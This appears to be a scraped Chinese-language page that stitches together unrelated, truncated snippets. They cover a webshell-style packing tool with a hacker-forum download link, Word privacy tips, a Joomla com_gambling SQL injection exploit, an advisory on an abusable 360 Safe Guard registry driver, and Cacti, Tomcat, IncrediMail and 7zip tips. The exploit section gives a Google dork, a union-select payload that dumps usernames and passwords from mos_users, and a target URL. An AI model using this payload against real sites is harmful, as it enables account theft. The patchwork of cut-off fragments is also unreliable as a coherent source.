像phpspy不能打包压缩目录也不能压缩成文件，它是在内存里直接下载，而且也不具备排除功能。

本程序能打包目录及子目录, 能排除指定的文件类型, 不仅能直接生成zip下载, 而且可以在文件系统里生成zip文件包。

下载地址：http://www.t00ls.net/attachment.php?aid=NDcyMXxmYmM1MzRjNnwxMjY1MjY1OTUwfGI5MTdDUUJpamxvTlRNVHFOcU8rTEYvN1RtcUo0amZibGtpc0hXSSswcjAvSFBj

你是否注意到，我们常用的Word、Excel等文档会泄漏创建者的隐私信息，比如打开一篇Word文件，点击Office按钮，选择“准备→属性→高级属性”，这篇文档的作者、单位等信息就一览无余了。另外，有经验的计算机用户还可以通过Word的批注、修订等获得创建者的一些信息，这些批注和修订显示了参与修改这篇文档所有人员的姓名。 如果你不想公开自己的信息，可以在共享自己创建的文档之前删除隐藏在文档中的隐私信息。
    1. 打开要检查是否存在隐藏数据和个人信息的 Word 文档。
...

google: inurl:com_gambling

Exploit:
-9999+union+select+1,concat(username,0x3a,password)+from+mos_users/*

利用：http://www.Site.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid \
...

360安全卫士是在中国广泛使用的免费上网安全软件。

360安全卫士会在安装过程中在用户系统上安装一个注册表操作程序，该程序可以被用来绕过操作系统的安全检查机制任意操作（设置、删除等）用户的注册表。由于该程序没有对调用者进行检查，导致任意程序（如各种木马程序等）可以通过该后门任意操作（设置、删除等）用户的注册表系统。

该程序包括两个文件：

1. bregdrv.sys：内核模式驱动，该驱动程序通过调用操作系统的未公开CmXxx系列函数来操作注册表，另外由于操作系统内部本身维护了很多同步数据、缓存数据，直接调用CmXxx系列函数操作注册表极有可能造成系统内部数据不同步，严重影响系统安全性，甚至可能导致用户正常数据丢失。

...

通常情况下如果需要了解DNS服务器的工作状态往往需要telnet或ssh到服务器上以命令的方式来获取。该方式不但麻烦而且不直观。本文介绍一种通过SNMP来对DNS服务器进行图形化监控的方法。
该系统主要是基于Cacti，由于cacti在网络监控中应用很多，这里对其安装配置不做介绍。Cacti本身不支持监控DNS的功能，首先下载Cacti的一个工具包，下载地址如下
http://uversaconsulting.net/download/bind9-stats-1.0.tar.gz
...

IncrediMail是一款别具一格的email软件，不仅具有传统email软件的基本功能，还具有非常酷的界面、寄信动画效果、可爱的收信邮差，还有很多的信笺、动画、音效、电子卡片等，可以组合出非常炫的电子邮件，让写E－mail和收E－mail都变成一种心动的体验。 

IncrediMail是一款共享软件，下载网址：http://www.incredimail.com/。IncrediMail的窗口的布局与网友们常用的OutlookExpress和Foxmail基本相同，不同的是在窗口的右上方有一个深蓝色的状态窗口，在普通情况下它显示当前的时间和日期，而当收发电子邮件的时候，就用它来显示邮件收发过程的进度。下面就向大家介绍一下它的超炫的特性及使用：
...

近几年，互联网的应用呈现出一种爆发增长的态势，网速越来越快，能够遍寻的软件越来越多，初级黑客凭借一些入门的教程和软件就能发起简单的攻击；另一方面，电脑的价格持续下降，企业内部的终端数量也在逐步增加，更多的资源，更复杂的网络使得IT运维人员在管控内网时心力交瘁，面对这些内忧外患，我们不得不重新审视网络安全问题。
下面，我们将介绍一些攻击行为案例，对于这些行为不知您是否遇到过？您的网络是否能够抵挡住这些攻击？您都做了哪些防范？如果对于攻击行为您并没有全面、细致、合规的操作不妨看看我们的建议和意见吧。

组策略是一个管理用户工作环境的技术，通过它可以确保用户拥有所需的工作环境，也可以通过它来限制用户，这不仅让用户拥有适当的环境，也减轻了系统管理员的管理负担。　    
在Windows 2000/XP/2003等操作系统目录中包含了几个 .adm 文件。这些文件是文本文件，称为“管理模板”，它们为组策略管理模板项目提供策略信息。虽然它们已经定制了许多策略用来完善管理员的日常操作，很可惜并没有将移动设备（指U盘/光驱/A驱等）列入到管理模板中，使现实环境中管理员对移动设备的管控成了很头痛的一件事。那么我们能否通过自建一个策略生成管理模板呢？答案是肯定的。接下来，我们将通过一个完整的实例来说明。
...

Tomcat 服务性错误而停止

操作系统：Windows Server 2003 SP2
JDK 版本为 6.0 update 6 安装在 D:\Java 目录下
Tomcat 版本为 6.0.16 安装 D:\Tomcat 目录下
故障描述：成功安装后 Tomcat 无法启动
日志错误：Apache Tomcat 服务因 0 (0x0) 服务性错误而停止
...

如果在Ubuntu中使用7zip解压缩rar格式的文件，却出现“unsupported method”的错误信息，可以使用“系统/管理/synaptic软件管理程序/新增7zip-rar”解决。